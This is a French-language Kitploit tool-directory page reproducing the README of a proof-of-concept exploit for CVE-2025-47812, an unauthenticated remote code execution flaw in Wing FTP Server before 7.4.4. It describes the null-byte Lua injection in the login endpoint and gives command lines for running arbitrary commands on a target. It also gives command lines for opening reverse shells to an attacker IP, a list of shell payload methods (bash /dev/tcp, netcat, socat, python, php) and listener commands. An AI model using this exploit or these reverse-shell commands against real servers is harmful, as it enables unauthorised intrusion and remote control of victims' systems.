Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-47812-PoC — Exploit d'exécution de code à distance non authentifié pour Wing FTP Server (CVE-2025-47812) avec plusieurs charges utiles de shell inversé, modes interactif et CLI, et gestion automatisée des sessions. | Kitploit
Outils/GitHubGitHub/havbay/cve-2025-47812-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed TeamingOutil d'Accès à Distance
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

Exploit d'exécution de code à distance non authentifié pour Wing FTP Server (CVE-2025-47812) avec plusieurs charges utiles de shell inversé, modes interactif et CLI, et gestion automatisée des sessions.

1il y a 6 moisPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-47812 — Exécution de code à distance sur le serveur Wing FTP (RCE)

Python CVSS Type

Aperçu

ChampValeur
CVECVE-2025-47812
Versions affectéesWing FTP Server < 7.4.4
TypeExécution de code à distance sans authentification
Score CVSS10.0 (Critique)
Corrigé dansWing FTP Server 7.4.4

Fonctionnement

La vulnérabilité réside dans le point de terminaison de connexion /loginok.html. Le serveur ne parvient pas à nettoyer les octets nuls (%00) dans le champ username. Cela permet à un attaquant d'injecter du code Lua arbitraire dans les fichiers de session, qui sont ensuite évalués côté serveur lorsque des points de terminaison comme /dir.html sont consultés — sans aucune authentification requise.

Référence : https://nvd.nist.gov/vuln/detail/CVE-2025-47812


Fonctionnalités

  • Exécution de commande sans authentification
  • Plusieurs payloads de reverse shell (socat, bash, python3, nc-e, nc-fifo, php)
  • Payload socat prioritaire pour un TTY interactif complet
  • Vérification préalable de l'accessibilité de la cible
  • Extraction automatique de l'UID de session avec une nouvelle session par tentative
  • Choisir un payload spécifique avec l'option --payload
  • Enregistrer la sortie de commande dans un fichier avec -o
  • --timeout et --delay configurables
  • Mode verbose/débogage avec -v
  • Gestion gracieuse de Ctrl+C
  • Récapitulatif des payloads après les tentatives de reverse shell
  • Mode argument CLI + menu interactif
  • Sortie colorée

Prérequis

root@kitploit:~
pip install requests

Utilisation

Mode interactif

root@kitploit:~
python3 wingftp_rce_exploit.py

Mode CLI

root@kitploit:~
# Exécuter une commande
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# Enregistrer la sortie dans un fichier
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# Reverse shell (essayer tous les payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# Reverse shell (payload spécifique)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

Toutes les options

root@kitploit:~
-u / --url        URL de base de la cible
-U / --username   Nom d'utilisateur (défaut : anonymous)
-c / --command    Commande à exécuter (mode commande)
-r / --rhost      Votre IP d'écoute (mode reverse shell)
-p / --rport      Votre port d'écoute (mode reverse shell)
     --payload    Payload spécifique à utiliser (voir liste ci-dessous)
     --timeout    Délai d'attente de la requête HTTP en secondes (défaut : 10)
     --delay      Délai entre les tentatives de payload en secondes (défaut : 4)
-o / --output     Enregistrer la sortie de commande dans un fichier
-v / --verbose    Activer la sortie de débogage

Payloads de Reverse Shell

NomMéthode
socatPTY complet via socat
bashRedirection /dev/tcp
python3Sous-processus socket
nc-eNetcat avec option -e
nc-fifoNetcat + mkfifo
phpPHP fsockopen

Exemples

Exécution de commande

root@kitploit:~
URL cible : http://192.168.1.10:5466
Nom d'utilisateur : anonymous
Choix     : 1
Commande  : whoami

Reverse shell

Étape 1 — Démarrez votre écouteur (socat recommandé pour un TTY complet) :

root@kitploit:~
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

Ou avec nc :

root@kitploit:~
nc -lvnp 4444

Étape 2 — Lancez l'exploit :

root@kitploit:~
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

Crédits

  • PoC original par blindma1den
  • Amélioré et étendu par Havbuy

Avertissement

Cet outil est destiné à des fins éducatives et uniquement à des tests de sécurité autorisés.
Ne l'utilisez PAS contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation écrite explicite.
L'utilisation non autorisée est illégale. Les auteurs déclinent toute responsabilité en cas de mauvaise utilisation.

Télécharger l’outil